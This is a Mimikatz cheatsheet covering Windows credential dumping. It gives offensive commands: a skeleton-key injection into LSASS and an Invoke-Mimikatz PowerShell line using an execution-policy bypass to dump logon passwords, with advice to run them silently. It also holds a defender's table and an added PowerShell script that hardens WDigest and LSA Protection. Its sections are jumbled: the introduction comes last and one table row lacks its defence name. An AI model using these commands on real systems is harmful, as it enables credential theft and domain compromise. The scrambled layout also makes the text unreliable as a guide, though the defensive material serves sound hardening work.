Mimikatz Cheatsheet
Script kiddies use it to cause damage. Professionals use it to find gaps before adversaries do.
misc::skeleton — Injects a master password into the LSASS process on a Domain Controller, allowing any user to authenticate with a "skeleton" password.
Advanced Workarounds
```powershell
# Using Invoke-Mimikatz (from PowerSploit)
powershell -exec bypass
Import-Module .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'
```
Save commands to a .txt file and execute silently.
| Defense | Why it Works |
| :--- | :--- |
| (Windows 10/11 + Server 2016+) | Runs LSASS as a virtualized protected process. Mimikatz cannot read its memory. |
| Enable "Run as Protected Process" (LSA Protection) | Prevents privilege::debug from accessing LSASS. |
| Disable WDigest (Registry key: UseLogonCredential = 0) | Prevents storage of plaintext passwords in memory. |
| Deploy EDR with LSASS Monitoring | EDR hooks OpenProcess and ReadProcessMemory calls on LSASS. |
| Restrict Admin Logons (Tiering) | Prevent domain admin sessions on low-value workstations. |
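Two of the table's defenses (disabling WDigest plaintext caching and enabling LSA Protection) are plain registry settings, so they can be audited and enforced from PowerShell. The script below is an added example, not part of the original cheatsheet; it assumes the documented registry locations for WDigest and Lsa and an elevated prompt.

```powershell
# Added defender-side audit/remediation for WDigest and LSA Protection (RunAsPPL).
# Not from the original cheatsheet. Requires an elevated (administrator) prompt.

$WDigestKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
$LsaKey     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

function Get-LsassHardeningState {
    # UseLogonCredential: 0 = no plaintext credentials kept in LSASS, 1 = cached.
    # A missing value means the OS default applies (caching is off by default
    # from Windows 8.1 / Server 2012 R2 onward, on by default on older builds).
    $useLogonCred = (Get-ItemProperty -Path $WDigestKey -Name UseLogonCredential `
                        -ErrorAction SilentlyContinue).UseLogonCredential
    # RunAsPPL: 1 = LSASS runs as a protected process, so even a handle opened
    # with SeDebugPrivilege from user mode cannot read its memory.
    $runAsPpl = (Get-ItemProperty -Path $LsaKey -Name RunAsPPL `
                    -ErrorAction SilentlyContinue).RunAsPPL

    $wdigestText = if ($null -eq $useLogonCred) { 'not set (OS default)' } else { $useLogonCred }
    $pplText     = if ($null -eq $runAsPpl)     { 'not set' }              else { $runAsPpl }

    [PSCustomObject]@{
        WDigestPlaintextDisabled = ($useLogonCred -eq 0)   # explicit 0 is the safe, auditable state
        UseLogonCredential       = $wdigestText
        LsaProtectionEnabled     = ($runAsPpl -ge 1)
        RunAsPPL                 = $pplText
    }
}

function Set-LsassHardening {
    # Writes the corrected values; -WhatIf shows the change without applying it.
    [CmdletBinding(SupportsShouldProcess)]
    param()
    if ($PSCmdlet.ShouldProcess($WDigestKey, 'Set UseLogonCredential = 0')) {
        New-ItemProperty -Path $WDigestKey -Name UseLogonCredential `
            -PropertyType DWord -Value 0 -Force | Out-Null
    }
    if ($PSCmdlet.ShouldProcess($LsaKey, 'Set RunAsPPL = 1 (effective after reboot)')) {
        New-ItemProperty -Path $LsaKey -Name RunAsPPL `
            -PropertyType DWord -Value 1 -Force | Out-Null
    }
}

# Usage: report the current state, then remediate if either setting is weak.
$state = Get-LsassHardeningState
$state | Format-List
if (-not ($state.WDigestPlaintextDisabled -and $state.LsaProtectionEnabled)) {
    Set-LsassHardening -WhatIf   # drop -WhatIf to apply
}
```

RunAsPPL only takes effect after a reboot, and on UEFI systems with Secure Boot the setting may be persisted in a UEFI variable, so plan the change rather than toggling it ad hoc.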
Mimikatz is widely used for "Pass-the-Ticket" and ticket forging attacks.
Understanding how tools like Mimikatz interact with a system is the first step in defending against unauthorized access. Here are common defensive measures:
privilege::debug — Grants the necessary rights to interact with the LSASS process.
Mimikatz is arguably the most powerful and infamous post-exploitation tool ever created. Developed by Benjamin Delpy (@gentilkiwi), it allows security professionals to extract plaintext passwords, hashes, PINs, and Kerberos tickets directly from Windows memory.
If you are defending a network, you must assume Mimikatz will be used.